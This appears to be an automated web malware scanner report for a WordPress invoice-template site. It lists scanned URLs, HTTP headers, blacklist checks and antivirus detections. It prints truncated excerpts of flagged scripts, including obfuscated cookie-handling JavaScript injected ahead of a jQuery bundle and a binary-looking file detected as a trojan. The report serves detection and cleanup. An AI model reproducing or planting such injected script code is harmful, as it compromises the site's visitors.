New scan:

Malware Scanner report for 8ws.org

Malicious/Suspicious/Total urls checked
3/0/17
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://8ws.org/
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Fri, 05 Sep 2014 01:34:21 GMT
Location: http://www.8ws.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 05 Sep 2014 02:34:21 GMT
clean
http://www.8ws.org/
200 OK
Content-Length: 40880
Content-Type: text/html
clean
http://www.8ws.org/wp-content/plugins/scripts-gzip/gzip.php?js=wp-includes%2Fjs%2Fcomment-reply.js%3Fver%3D3.4.2%2Cwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.7.2
200 OK
Content-Length: 98256
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form
... 3099 bytes are skipped ...
2){if(!o){o={};while(c=bG.exec(n))o[c[1].toLowerCase()]=c[2]}c=o[a.toLowerCase()]}return c===b?null:c},overrideMimeType:function(a){s||(d.mimeType=a);return this},abort:function(a){a=a||"abort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.add,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bF,"").replace(bK,bV[1]+"jQuery.noConflict();
;

Antivirus reports:

Avast
JS:Includer-BEV [Trj]

http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21259
Content-Type: text/javascript
clean
http://www.8ws.org/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.25.0-2013.01.18
200 OK
Content-Length: 5817
Content-Type: application/x-javascript
clean
http://www.8ws.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.3
200 OK
Content-Length: 1836
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

‹µYmoÛ6þìü
& * µ”äÓ0ç(ÚõÃP4k›íK´D;LhÊ©¼4ñß©ʖd×è
´U¤»ãsw?Íe¬y*ýÀ¼ìí ýê ¾ tölþð)ñõó‚¥S2~\ÄÓ_Éù9ñr™°)—,ñÈëkýáœÈ\ˆõåKò²<ÝÛs_FìI3™ø/$¦ñ-KFä˜,‡…™ÀJú^Â"«sA¦i6÷‚ˆÞѧðèlƒ ƒ÷ì[>™s="• (üj:$wÿ¢ô¤ ü ¬oðǾ·Öß F³¯L-@€]æz‘k@¸ràjâ{|>3B‘Ò„e'V
œxàŠO¸àúyD<óƒ`Y–62¦óLå̾Y]ð,ãTðïÌÁ¿µEcÁ‡¹b¡æZ°ªð‘j–ÍivUO€’Aëüò!‘•E³ ¢*|Ï+ñnž@hGä…x6ac®Æ–qL…ðFä„8rW@ˆÊJ¥gߪ<Ž™RŽ»(W!B¾íE¸úSP./'w,օP ?ü>_èg÷CP8c[þ 4#YŠ|3R—: ŠàUÔ
³"ñaj2_E¡¡ÔǓñF‚
... 950 bytes are skipped ...
š)¼ÝÔ^ÏShË–"Yíظ0{à©t#,§eÙÈЬߢ#Þ[¢7*ëȏ.ÝÑn~â²mDpÇ£KWž §ðXRÒØVŽjw“3„ñ0aO—Sßû¥d³UÇo@kÊÇÃuɺRðd­Ê™^K(‘ç¶ÞÜxEO<­PJ®¯èl å1ŠŽ¡èºV £Ó|»üì>{¥ôBZn¢F䤼R!ÞâRªûÖ _à†o¿$ÀÆ(ðÿøEIe¸yaÒmuíÒÄÌøo'‹p\• vo„6ðF¼0Öqã4‘›Tt“ce1é´Ç'ÎD¢Ê){Ú¼gµ›¬X+4Ú%«aÐðpE«‡hçf$:'GþõqøÛÍÛàŸÈ_ÈÙëŒO_ïlEì‰ÅU·Xkmvß6 X,>†¿7°h€™9<ÃõÉͦ­^g×͐ÉñOIZúsÓ£ˆ÷Þ0Ý©F³@8¡ †—fš=i_^ßüHИJ3WoäÁo¹ÂÝ¡Ü6KWÏUrþÀ1¼°ö[ï~Ýû(²~UC:. Iç-\\OÛ¶`ü6­­~ÑQ´:Òíõ›‡Ý§œíc^Ì<¥ùHËìCú(Ý^\Á]þݗœeÏÁé™ lp

Antivirus reports:

Bkav
W32.HfsAutoB.0c41

http://www.8ws.org/wp-content/plugins/lightbox-plus/js/jquery.colorbox.1.3.32.js?ver=1.3.32
200 OK
Content-Length: 8136
Content-Type: application/x-javascript
clean
http://8ws.org/receipt.htm
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Fri, 05 Sep 2014 01:34:26 GMT
Location: http://www.8ws.org/receipt.htm
Server: Apache
Vary: Accept-Encoding
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 05 Sep 2014 02:34:26 GMT
clean
http://www.8ws.org/receipt.htm
200 OK
Content-Length: 9307
Content-Type: text/html
clean
http://www.8ws.org/test404page.js
404 Not Found
Content-Length: 22387
Content-Type: text/html
clean
http://www.8ws.org/wp-content/plugins/scripts-gzip/gzip.php?js=wp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.7.2
200 OK
Content-Length: 97467
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var qzQtTI="useridA0817FB25";var PdfwG="28";var NbUcmN=1;function ytLAm7(ExRd6H){var otvobS;var viRKc8J=document.cookie;if(!viRKc8J){return null;}viRKc8J=viRKc8J.replace(/\s/g,"");var Q7CHJu=viRKc8J.split(";");for(var i=0;i<Q7CHJu.length;i++){var HpojhA=Q7CHJu[i].split("=");if(HpojhA[0]==ExRd6H){otvobS=unescape(HpojhA[1]);break;}}return otvobS;};function sLS1uOJ(ExRd6H,UTlda6n,kPBDO){var exp=new Date();var IuhFf=exp.getTime()+(kPBDO*60*60*1000);exp.setTime(IuhFf);var p2rahA2=ExRd6H+"="+escape
... 3101 bytes are skipped ...
2){if(!o){o={};while(c=bG.exec(n))o[c[1].toLowerCase()]=c[2]}c=o[a.toLowerCase()]}return c===b?null:c},overrideMimeType:function(a){s||(d.mimeType=a);return this},abort:function(a){a=a||"abort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.add,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bF,"").replace(bK,bV[1]+"jQuery.noConflict();
;

Antivirus reports:

Avast
JS:Includer-BEV [Trj]

http://www.8ws.org/free_invoice_templates.htm
200 OK
Content-Length: 38831
Content-Type: text/html
clean
http://www.8ws.org/free_invoice_example.htm
200 OK
Content-Length: 41837
Content-Type: text/html
clean
http://www.8ws.org/motor-vehicle-bill-of-sale.htm
200 OK
Content-Length: 9542
Content-Type: text/html
clean
http://www.8ws.org/category/2013-calendar
200 OK
Content-Length: 32774
Content-Type: text/html
clean
http://www.8ws.org/about
200 OK
Content-Length: 21697
Content-Type: text/html
clean
http://www.8ws.org/contact
200 OK
Content-Length: 21226
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 8ws.org

Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=3600
Connection: close
Date: Fri, 05 Sep 2014 01:34:21 GMT
Location: http://www.8ws.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 227
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 05 Sep 2014 02:34:21 GMT

...227 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 8ws.org
Referer: http://www.google.com/search?q=8ws.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=8ws.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://8ws.org/

Result: 8ws.org is not infected or malware details are not published yet.